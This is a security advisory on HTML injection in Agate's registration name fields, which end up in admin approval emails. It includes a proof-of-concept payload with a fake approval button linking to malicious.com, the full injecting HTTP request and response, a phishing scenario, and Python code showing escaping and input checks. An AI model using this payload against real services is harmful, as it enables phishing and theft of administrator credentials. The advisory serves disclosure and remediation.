Summary
When registering for an Agate account, arbitrary HTML code can be injected into a user's first and last name. This HTML is then rendered in the email sent to administrative users. The Agate service account sends this email and appears trustworthy, making this a significant risk for phishing attacks.
Details
HTML injection involves an attacker's ability to insert unauthorized HTML tags into a webpage. This happens when an application fails to sanitize user-supplied data properly. By injecting their own HTML code, attackers can manipulate the content and structure of the page, potentially leading to deceptive displays or phishing attempts. This attack is typically used in conjunction with some form of social engineering, as the attack exploits a code-based vulnerability and a user's trust.
PoC
As an unauthenticated user, a request to create a new user is made. HTML is injected into the last name parameter; the payload mimics the appearance of the approval email that an admin would receive from this endpoint.
HTML:
<p style="margin: auto;text-align: center;"> <!-- Agate link --> <a href="https://malicious.com" target="_blank" style="color:#1f2d3d;font-weight:bold;background-color:#ffc107;padding:10px 20px;border-radius:15px;text-decoration:none;display: inline-block;margin-bottom: 0;font-weight: normal;text-align: center;vertical-align: middle;-ms-touch-action: manipulation;touch-action: manipulation;cursor: pointer;white-space: nowrap;padding: 10px 15px;border-radius: 10px;-webkit-user-select: none;-moz-user-select: none;-ms-user-select: none;user-select: none;"> Approve/Reject Account </a> </p> </div> </div> <p style="display: block;margin: 5px 0 10px;font-size:14px;line-height:2;color:#aaa;"> This is a generated email. Please do not reply. </p> </div> </div><br><br><br><br><br><br><br><br><br><br><br><br>
Request:
POST /ws/users/_join HTTP/2
Host: <redacted>
Cookie: NG_TRANSLATE_LANG_KEY=en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: <redacted>
Content-Type: application/x-www-form-urlencoded
Content-Length: 3923
Origin: <redacted>
Dnt: 1
Sec-Gpc: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
[email protected]&firstname=<redacted> requested an account and is awaiting approval&lastname=<p style="margin: auto;text-align: center;"> <!-- Agate link --> <a href="https://malicious.com" target="_blank" style="color:#1f2d3d;font-weight:bold;background-color:#ffc107;padding:10px 20px;border-radius:15px;text-decoration:none;display: inline-block;margin-bottom: 0;font-weight: normal;text-align: center;vertical-align: middle;-ms-touch-action: manipulation;touch-action: manipulation;cursor: pointer;white-space: nowrap;padding: 10px 15px;border-radius: 10px;-webkit-user-select: none;-moz-user-select: none;-ms-user-select: none;user-select: none;"> Approve/Reject Account </a> </p> </div> </div> <p style="display: block;margin: 5px 0 10px;font-size:14px;line-height:2;color:#aaa;"> This is a generated email. Please do not reply. </p> </div> </div><br><br><br><br><br><br><br><br><br><br><br><br>&locale=en&g-recaptcha-response=<redacted>
Response:
HTTP/2 201 Created
Server: nginx/1.27.2
Date: Wed, 27 Nov 2024 13:41:08 GMT
Content-Length: 0
Vary: Accept-Encoding
X-Frame-Options: DENY
Content-Security-Policy: frame-ancestors 'none'
Location: <redacted>
Set-Cookie: agatesid=;Version=1;Comment="Agate session deleted";Path=/;Max-Age=0;Secure;HttpOnly
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
As a result, the Agate administrator will receive the following email from the Agate service email account. Note that the first displayed button is the malicious button, which will send the victim to the malicious website. The second button is the legitimate button. With more effort, this PoC can be made more convincing, potentially hiding the legitimate button altogether.
Received email: [screenshot not reproduced in this extract]
Impact
A potential attack scenario might look like this:
- The attacker registers a new account using a malicious first and last name containing the injected HTML content. The content mimics the appearance of an account approval email sent to admins.
- The Agate administrator receives the email and clicks the link, indistinguishable from the regular approval email.
- The malicious URL directs the admin to a webpage which mimics the appearance of the Agate login page and steals the administrator's credentials.
Therefore, administrative users are impacted, as they can be targeted by unauthenticated users.
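The root cause is that the first and last name are interpolated into the HTML email body without escaping. The following Python example (added here; it is not Agate's own Java code, and the template, URL and function names are hypothetical) contrasts the vulnerable interpolation with output encoding at the HTML sink, plus an input-side check that rejects markup in a name field. It uses a shortened copy of the payload from the PoC as constructed input.

```python
import html
import re

# Constructed sample: a shortened copy of the injected last name from the PoC above.
INJECTED_LASTNAME = (
    '<p style="margin: auto;text-align: center;"> <a href="https://malicious.com" '
    'target="_blank"> Approve/Reject Account </a> </p> </div> </div>'
)

# Hypothetical email body standing in for the admin notification template.
TEMPLATE = (
    '<div><p>{firstname} {lastname} requested an account and is awaiting approval.</p>'
    '<p><a href="{approve_url}">Approve/Reject Account</a></p></div>'
)


def render_unsafe(firstname, lastname, approve_url):
    """Vulnerable rendering: user-controlled names are placed into the HTML raw."""
    return TEMPLATE.format(firstname=firstname, lastname=lastname, approve_url=approve_url)


def render_safe(firstname, lastname, approve_url):
    """Hardened rendering: every user-controlled value is HTML-escaped at the sink,
    so injected tags become visible text instead of active markup."""
    return TEMPLATE.format(
        firstname=html.escape(firstname, quote=True),
        lastname=html.escape(lastname, quote=True),
        approve_url=html.escape(approve_url, quote=True),
    )


TAG_RE = re.compile(r"<[^>]*>")


def contains_markup(value):
    """Input-side check for the registration endpoint: a person's name
    should never contain angle brackets or anything that parses as a tag."""
    return "<" in value or ">" in value or TAG_RE.search(value) is not None


def count_links(rendered):
    """Count anchor tags in a rendered email; the legitimate template has exactly one.
    A second anchor means user input became active markup."""
    return len(re.findall(r"<a\s", rendered, flags=re.IGNORECASE))
```

Defence in depth means doing both: escape at the sink (which fixes the bug regardless of input) and reject markup at the input, which also blocks the payload from being stored and re-rendered elsewhere.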